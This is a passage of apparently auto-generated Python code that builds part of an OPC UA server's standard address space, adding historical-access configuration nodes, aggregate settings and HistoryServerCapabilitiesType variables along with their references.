refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2324, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2325, 0)
node.BrowseName = QualifiedName('MaxTimeInterval', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxTimeInterval")
attrs.DataType = NumericNodeId(290, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2325, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2325, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2325, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2326, 0)
node.BrowseName = QualifiedName('MinTimeInterval', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MinTimeInterval")
attrs.DataType = NumericNodeId(290, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2326, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2326, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2326, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2327, 0)
node.BrowseName = QualifiedName('ExceptionDeviation', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ExceptionDeviation")
attrs.DataType = ua.NodeId(ua.ObjectIds.Double)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2327, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2327, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2327, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2328, 0)
node.BrowseName = QualifiedName('ExceptionDeviationFormat', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ExceptionDeviationFormat")
attrs.DataType = NumericNodeId(890, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2328, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2328, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2328, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11499, 0)
node.BrowseName = QualifiedName('StartOfArchive', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("StartOfArchive")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11499, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11499, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11499, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11500, 0)
node.BrowseName = QualifiedName('StartOfOnlineArchive', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2318, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("StartOfOnlineArchive")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11500, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11500, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(80, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11500, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11202, 0)
node.BrowseName = QualifiedName('HA Configuration', 0)
node.NodeClass = NodeClass.Object
node.TypeDefinition = NumericNodeId(2318, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("HA Configuration")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11202, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11202, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11208, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11202, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2318, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11203, 0)
node.BrowseName = QualifiedName('AggregateConfiguration', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(11202, 0)
node.ReferenceTypeId = NumericNodeId(47, 0)
node.TypeDefinition = NumericNodeId(11187, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("AggregateConfiguration")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11204, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11205, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11206, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11207, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11187, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(11203, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11202, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11204, 0)
node.BrowseName = QualifiedName('TreatUncertainAsBad', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11203, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("TreatUncertainAsBad")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11204, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11204, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11205, 0)
node.BrowseName = QualifiedName('PercentDataBad', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11203, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PercentDataBad")
attrs.DataType = ua.NodeId(ua.ObjectIds.Byte)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11205, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11205, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11206, 0)
node.BrowseName = QualifiedName('PercentDataGood', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11203, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("PercentDataGood")
attrs.DataType = ua.NodeId(ua.ObjectIds.Byte)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11206, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11206, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11207, 0)
node.BrowseName = QualifiedName('UseSlopedExtrapolation', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11203, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UseSlopedExtrapolation")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11207, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11207, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11203, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11208, 0)
node.BrowseName = QualifiedName('Stepped', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(11202, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("Stepped")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11208, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11208, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11202, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11215, 0)
node.BrowseName = QualifiedName('HistoricalEventFilter', 0)
node.NodeClass = NodeClass.Variable
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("HistoricalEventFilter")
attrs.DataType = NumericNodeId(725, 0)
attrs.ValueRank = -2
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11215, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2330, 0)
node.BrowseName = QualifiedName('HistoryServerCapabilitiesType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(58, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("HistoryServerCapabilitiesType")
attrs.IsAbstract = False
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2331, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2332, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11268, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11269, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2334, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2335, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2336, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2337, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2338, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11278, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11279, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11280, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11501, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11270, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(47, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(11172, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(2330, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(58, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2331, 0)
node.BrowseName = QualifiedName('AccessHistoryDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2331, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2331, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2331, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2332, 0)
node.BrowseName = QualifiedName('AccessHistoryEventsCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("AccessHistoryEventsCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2332, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2332, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(2332, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11268, 0)
node.BrowseName = QualifiedName('MaxReturnDataValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxReturnDataValues")
attrs.DataType = ua.NodeId(ua.ObjectIds.UInt32)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11268, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11268, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11268, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(11269, 0)
node.BrowseName = QualifiedName('MaxReturnEventValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("MaxReturnEventValues")
attrs.DataType = ua.NodeId(ua.ObjectIds.UInt32)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(11269, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(11269, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(11269, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2330, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(2334, 0)
node.BrowseName = QualifiedName('InsertDataCapability', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(2330, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("InsertDataCapability")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(2334, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(2334, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
